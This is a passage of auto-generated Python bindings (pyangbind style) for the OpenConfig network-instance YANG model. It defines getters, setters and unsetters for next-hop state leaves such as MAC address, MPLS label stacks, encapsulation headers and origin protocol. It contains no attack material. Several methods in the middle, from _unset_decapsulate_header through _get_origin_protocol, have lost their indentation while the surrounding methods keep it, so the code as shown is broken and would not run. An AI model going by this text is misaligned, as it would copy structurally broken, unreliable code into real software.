                            "pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
                        },
                    ),
                    restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
                ),
            ],
            is_leaf=True,
            yang_name="ip-address",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="inet:ip-address-no-zone",
            is_config=False,
        )
    def _get_mac_address(self):
        """
        Getter method for mac_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/mac_address (yang:mac-address)
        YANG Description: The MAC address of the next-hop if resolved by the local
        network instance.
        """
        # Returns the pattern-restricted MAC-address leaf wrapper.
        return self.__mac_address
    def _set_mac_address(self, v, load=False):
        """
        Setter method for mac_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/mac_address (yang:mac-address)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_mac_address is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_mac_address() directly.
        YANG Description: The MAC address of the next-hop if resolved by the local
        network instance.
        """
        # Unwrap pyangbind union/typedef values into their native type first.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        # Re-wrap the value; failure means it does not match the MAC pattern.
        try:
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
                ),
                is_leaf=True,
                yang_name="mac-address",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="yang:mac-address",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """mac_address must be of a type compatible with yang:mac-address""",
                    "defined-type": "yang:mac-address",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'}), is_leaf=True, yang_name="mac-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:mac-address', is_config=False)""",
                }
            )
        self.__mac_address = t
        if hasattr(self, "_set"):
            self._set()
    def _unset_mac_address(self):
        # Reset the leaf to a fresh, default-initialised wrapper.
        self.__mac_address = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
            ),
            is_leaf=True,
            yang_name="mac-address",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="yang:mac-address",
            is_config=False,
        )
    def _get_popped_mpls_label_stack(self):
        """
        Getter method for popped_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/popped_mpls_label_stack (oc-mplst:mpls-label)
        YANG Description: The MPLS label stack to be popped from the packet when
        switched by the system. The stack is encoding as a leaf-list
        whereby the other of the entries is such that the first entry
        is the label lowest down the label stack to be popped.
        If the local system pops the outer-most label 400, then the
        value of this list is [400,]. If the local system removes two
        labels, the outer-most being 500, and the second of which is
        500, then the value of the list is [500, 400].
        A swap operation is reflected by entries in the
        popped-mpls-label-stack and pushed-mpls-label-stack nodes.
        """
        # Returns the typed leaf-list wrapper of MPLS labels.
        return self.__popped_mpls_label_stack
    def _set_popped_mpls_label_stack(self, v, load=False):
        """
        Setter method for popped_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/popped_mpls_label_stack (oc-mplst:mpls-label)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_popped_mpls_label_stack is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_popped_mpls_label_stack() directly.
        YANG Description: The MPLS label stack to be popped from the packet when
        switched by the system. The stack is encoding as a leaf-list
        whereby the other of the entries is such that the first entry
        is the label lowest down the label stack to be popped.
        If the local system pops the outer-most label 400, then the
        value of this list is [400,]. If the local system removes two
        labels, the outer-most being 500, and the second of which is
        500, then the value of the list is [500, 400].
        A swap operation is reflected by entries in the
        popped-mpls-label-stack and pushed-mpls-label-stack nodes.
        """
        # Unwrap pyangbind union/typedef values into their native type first.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        # Re-wrap the list; each entry must be a numeric label (16..1048575)
        # or one of the reserved-label enum names.
        try:
            t = YANGDynClass(
                v,
                base=TypedListType(
                    allowed_type=[
                        RestrictedClassType(
                            base_type=RestrictedClassType(
                                base_type=long,
                                restriction_dict={"range": ["0..4294967295"]},
                                int_size=32,
                            ),
                            restriction_dict={"range": ["16..1048575"]},
                        ),
                        RestrictedClassType(
                            base_type=six.text_type,
                            restriction_type="dict_key",
                            restriction_arg={
                                "IPV4_EXPLICIT_NULL": {"value": 0},
                                "ROUTER_ALERT": {"value": 1},
                                "IPV6_EXPLICIT_NULL": {"value": 2},
                                "IMPLICIT_NULL": {"value": 3},
                                "ENTROPY_LABEL_INDICATOR": {"value": 7},
                                "NO_LABEL": {},
                            },
                        ),
                    ]
                ),
                is_leaf=False,
                yang_name="popped-mpls-label-stack",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="oc-mplst:mpls-label",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """popped_mpls_label_stack must be of a type compatible with oc-mplst:mpls-label""",
                    "defined-type": "oc-mplst:mpls-label",
                    "generated-type": """YANGDynClass(base=TypedListType(allowed_type=[RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': ['16..1048575']}),RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4_EXPLICIT_NULL': {'value': 0}, 'ROUTER_ALERT': {'value': 1}, 'IPV6_EXPLICIT_NULL': {'value': 2}, 'IMPLICIT_NULL': {'value': 3}, 'ENTROPY_LABEL_INDICATOR': {'value': 7}, 'NO_LABEL': {}},),]), is_leaf=False, yang_name="popped-mpls-label-stack", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-mplst:mpls-label', is_config=False)""",
                }
            )
        self.__popped_mpls_label_stack = t
        if hasattr(self, "_set"):
            self._set()
    def _unset_popped_mpls_label_stack(self):
        # Reset the leaf-list to a fresh, default-initialised wrapper.
        self.__popped_mpls_label_stack = YANGDynClass(
            base=TypedListType(
                allowed_type=[
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=long,
                            restriction_dict={"range": ["0..4294967295"]},
                            int_size=32,
                        ),
                        restriction_dict={"range": ["16..1048575"]},
                    ),
                    RestrictedClassType(
                        base_type=six.text_type,
                        restriction_type="dict_key",
                        restriction_arg={
                            "IPV4_EXPLICIT_NULL": {"value": 0},
                            "ROUTER_ALERT": {"value": 1},
                            "IPV6_EXPLICIT_NULL": {"value": 2},
                            "IMPLICIT_NULL": {"value": 3},
                            "ENTROPY_LABEL_INDICATOR": {"value": 7},
                            "NO_LABEL": {},
                        },
                    ),
                ]
            ),
            is_leaf=False,
            yang_name="popped-mpls-label-stack",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-mplst:mpls-label",
            is_config=False,
        )
    def _get_pushed_mpls_label_stack(self):
        """
        Getter method for pushed_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/pushed_mpls_label_stack (oc-mplst:mpls-label)
        YANG Description: The MPLS label stack imposed when forwarding packets to the
        next-hop
        - the stack is encoded as a leaf list whereby the order of the
        entries is such that the first entry in the list is the
        label at the bottom of the stack to be pushed.
        To this end, a packet which is to forwarded to a device using
        a service label of 42, and a transport label of 8072 will be
        represented with a label stack list of [42, 8072].
        The MPLS label stack list is ordered by the user, such that no
        system re-ordering of leaves is permitted by the system.
        A swap operation is reflected by entries in the
        popped-mpls-label-stack and pushed-mpls-label-stack nodes.
        """
        # Returns the typed leaf-list wrapper of MPLS labels.
        return self.__pushed_mpls_label_stack
    def _set_pushed_mpls_label_stack(self, v, load=False):
        """
        Setter method for pushed_mpls_label_stack, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/pushed_mpls_label_stack (oc-mplst:mpls-label)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_pushed_mpls_label_stack is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_pushed_mpls_label_stack() directly.
        YANG Description: The MPLS label stack imposed when forwarding packets to the
        next-hop
        - the stack is encoded as a leaf list whereby the order of the
        entries is such that the first entry in the list is the
        label at the bottom of the stack to be pushed.
        To this end, a packet which is to forwarded to a device using
        a service label of 42, and a transport label of 8072 will be
        represented with a label stack list of [42, 8072].
        The MPLS label stack list is ordered by the user, such that no
        system re-ordering of leaves is permitted by the system.
        A swap operation is reflected by entries in the
        popped-mpls-label-stack and pushed-mpls-label-stack nodes.
        """
        # Unwrap pyangbind union/typedef values into their native type first.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        # Re-wrap the list; each entry must be a numeric label (16..1048575)
        # or one of the reserved-label enum names.
        try:
            t = YANGDynClass(
                v,
                base=TypedListType(
                    allowed_type=[
                        RestrictedClassType(
                            base_type=RestrictedClassType(
                                base_type=long,
                                restriction_dict={"range": ["0..4294967295"]},
                                int_size=32,
                            ),
                            restriction_dict={"range": ["16..1048575"]},
                        ),
                        RestrictedClassType(
                            base_type=six.text_type,
                            restriction_type="dict_key",
                            restriction_arg={
                                "IPV4_EXPLICIT_NULL": {"value": 0},
                                "ROUTER_ALERT": {"value": 1},
                                "IPV6_EXPLICIT_NULL": {"value": 2},
                                "IMPLICIT_NULL": {"value": 3},
                                "ENTROPY_LABEL_INDICATOR": {"value": 7},
                                "NO_LABEL": {},
                            },
                        ),
                    ]
                ),
                is_leaf=False,
                yang_name="pushed-mpls-label-stack",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="oc-mplst:mpls-label",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """pushed_mpls_label_stack must be of a type compatible with oc-mplst:mpls-label""",
                    "defined-type": "oc-mplst:mpls-label",
                    "generated-type": """YANGDynClass(base=TypedListType(allowed_type=[RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': ['16..1048575']}),RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'IPV4_EXPLICIT_NULL': {'value': 0}, 'ROUTER_ALERT': {'value': 1}, 'IPV6_EXPLICIT_NULL': {'value': 2}, 'IMPLICIT_NULL': {'value': 3}, 'ENTROPY_LABEL_INDICATOR': {'value': 7}, 'NO_LABEL': {}},),]), is_leaf=False, yang_name="pushed-mpls-label-stack", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-mplst:mpls-label', is_config=False)""",
                }
            )
        self.__pushed_mpls_label_stack = t
        if hasattr(self, "_set"):
            self._set()
    def _unset_pushed_mpls_label_stack(self):
        # Reset the leaf-list to a fresh, default-initialised wrapper.
        self.__pushed_mpls_label_stack = YANGDynClass(
            base=TypedListType(
                allowed_type=[
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=long,
                            restriction_dict={"range": ["0..4294967295"]},
                            int_size=32,
                        ),
                        restriction_dict={"range": ["16..1048575"]},
                    ),
                    RestrictedClassType(
                        base_type=six.text_type,
                        restriction_type="dict_key",
                        restriction_arg={
                            "IPV4_EXPLICIT_NULL": {"value": 0},
                            "ROUTER_ALERT": {"value": 1},
                            "IPV6_EXPLICIT_NULL": {"value": 2},
                            "IMPLICIT_NULL": {"value": 3},
                            "ENTROPY_LABEL_INDICATOR": {"value": 7},
                            "NO_LABEL": {},
                        },
                    ),
                ]
            ),
            is_leaf=False,
            yang_name="pushed-mpls-label-stack",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-mplst:mpls-label",
            is_config=False,
        )
    def _get_decapsulate_header(self):
        """
        Getter method for decapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/decapsulate_header (oc-aftt:encapsulation-header-type)
        YANG Description: When forwarding a packet to the specified next-hop, the local
        system performs a decapsulation of the packet - removing the
        specified header type. In the case that no next-hop is
        specified, the packet header is removed, and a subsequent
        forwarding lookup is performed on the packet encapsulated
        within the header, matched within the relevant AFT within the
        specified network-instance.
        """
        # Returns the enum-restricted (GRE/IPV4/IPV6/MPLS) leaf wrapper.
        return self.__decapsulate_header
    def _set_decapsulate_header(self, v, load=False):
        """
        Setter method for decapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/decapsulate_header (oc-aftt:encapsulation-header-type)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_decapsulate_header is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_decapsulate_header() directly.
        YANG Description: When forwarding a packet to the specified next-hop, the local
        system performs a decapsulation of the packet - removing the
        specified header type. In the case that no next-hop is
        specified, the packet header is removed, and a subsequent
        forwarding lookup is performed on the packet encapsulated
        within the header, matched within the relevant AFT within the
        specified network-instance.
        """
        # If v is already a YANGDynClass wrapper, unwrap it to its underlying
        # type before revalidating it below.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Validate v against the enumerated encapsulation header types.
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_type="dict_key",
                    restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
                ),
                is_leaf=True,
                yang_name="decapsulate-header",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="oc-aftt:encapsulation-header-type",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Re-raise as a structured ValueError carrying the expected YANG
            # type, so callers can produce a meaningful error report.
            raise ValueError(
                {
                    "error-string": """decapsulate_header must be of a type compatible with oc-aftt:encapsulation-header-type""",
                    "defined-type": "oc-aftt:encapsulation-header-type",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'GRE': {}, 'IPV4': {}, 'IPV6': {}, 'MPLS': {}},), is_leaf=True, yang_name="decapsulate-header", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-aftt:encapsulation-header-type', is_config=False)""",
                }
            )
        self.__decapsulate_header = t
        # Notify the parent object of the change, if supported.
        if hasattr(self, "_set"):
            self._set()
def _unset_decapsulate_header(self):
self.__decapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="decapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
def _get_encapsulate_header(self):
"""
Getter method for encapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/encapsulate_header (oc-aftt:encapsulation-header-type)
YANG Description: When forwarding a packet to the specified next-hop the local
system performs an encapsulation of the packet - adding the
specified header type.
"""
return self.__encapsulate_header
    def _set_encapsulate_header(self, v, load=False):
        """
        Setter method for encapsulate_header, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/encapsulate_header (oc-aftt:encapsulation-header-type)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_encapsulate_header is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_encapsulate_header() directly.
        YANG Description: When forwarding a packet to the specified next-hop the local
        system performs an encapsulation of the packet - adding the
        specified header type.
        """
        # If v is already a YANGDynClass wrapper, unwrap it to its underlying
        # type before revalidating it below.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Validate v against the enumerated encapsulation header types.
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_type="dict_key",
                    restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
                ),
                is_leaf=True,
                yang_name="encapsulate-header",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="oc-aftt:encapsulation-header-type",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Re-raise as a structured ValueError carrying the expected YANG
            # type, so callers can produce a meaningful error report.
            raise ValueError(
                {
                    "error-string": """encapsulate_header must be of a type compatible with oc-aftt:encapsulation-header-type""",
                    "defined-type": "oc-aftt:encapsulation-header-type",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'GRE': {}, 'IPV4': {}, 'IPV6': {}, 'MPLS': {}},), is_leaf=True, yang_name="encapsulate-header", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-aftt:encapsulation-header-type', is_config=False)""",
                }
            )
        self.__encapsulate_header = t
        # Notify the parent object of the change, if supported.
        if hasattr(self, "_set"):
            self._set()
def _unset_encapsulate_header(self):
self.__encapsulate_header = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
),
is_leaf=True,
yang_name="encapsulate-header",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-aftt:encapsulation-header-type",
is_config=False,
)
def _get_origin_protocol(self):
"""
Getter method for origin_protocol, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/origin_protocol (identityref)
YANG Description: The protocol from which the AFT entry was learned.
"""
return self.__origin_protocol
    def _set_origin_protocol(self, v, load=False):
        """
        Setter method for origin_protocol, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/origin_protocol (identityref)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_origin_protocol is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_origin_protocol() directly.
        YANG Description: The protocol from which the AFT entry was learned.
        """
        # If v is already a YANGDynClass wrapper, unwrap it to its underlying
        # type before revalidating it below.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            # Validate v against the INSTALL_PROTOCOL_TYPE identities from
            # openconfig-policy-types; each identity is accepted unprefixed
            # or with either module prefix (oc-pol-types:/oc-pt:).
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=six.text_type,
                    restriction_type="dict_key",
                    restriction_arg={
                        "BGP": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:BGP": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:BGP": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "ISIS": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:ISIS": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:ISIS": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "OSPF": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:OSPF": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:OSPF": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "OSPF3": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:OSPF3": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:OSPF3": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "STATIC": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:STATIC": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:STATIC": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "DIRECTLY_CONNECTED": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:DIRECTLY_CONNECTED": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:DIRECTLY_CONNECTED": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "LOCAL_AGGREGATE": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pol-types:LOCAL_AGGREGATE": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                        "oc-pt:LOCAL_AGGREGATE": {
                            "@module": "openconfig-policy-types",
                            "@namespace": "http://openconfig.net/yang/policy-types",
                        },
                    },
                ),
                is_leaf=True,
                yang_name="origin-protocol",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="identityref",
                is_config=False,
            )
        except (TypeError, ValueError):
            # Re-raise as a structured ValueError carrying the expected YANG
            # type, so callers can produce a meaningful error report.
            raise ValueError(
                {
                    "error-string": """origin_protocol must be of a type compatible with identityref""",
                    "defined-type": "openconfig-network-instance:identityref",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:BGP': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:ISIS': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:OSPF': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:OSPF3': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:STATIC': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', 
'@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:DIRECTLY_CONNECTED': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pol-types:LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}, 'oc-pt:LOCAL_AGGREGATE': {'@module': 'openconfig-policy-types', '@namespace': 'http://openconfig.net/yang/policy-types'}},), is_leaf=True, yang_name="origin-protocol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=False)""",
                }
            )
        self.__origin_protocol = t
        # Notify the parent object of the change, if supported.
        if hasattr(self, "_set"):
            self._set()
    def _unset_origin_protocol(self):
        # Reset origin-protocol to a fresh, unset identityref instance.
        # Accepted values are the INSTALL_PROTOCOL_TYPE identities from
        # openconfig-policy-types, unprefixed or with either module prefix.
        self.__origin_protocol = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                },
            ),
            is_leaf=True,
            yang_name="origin-protocol",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
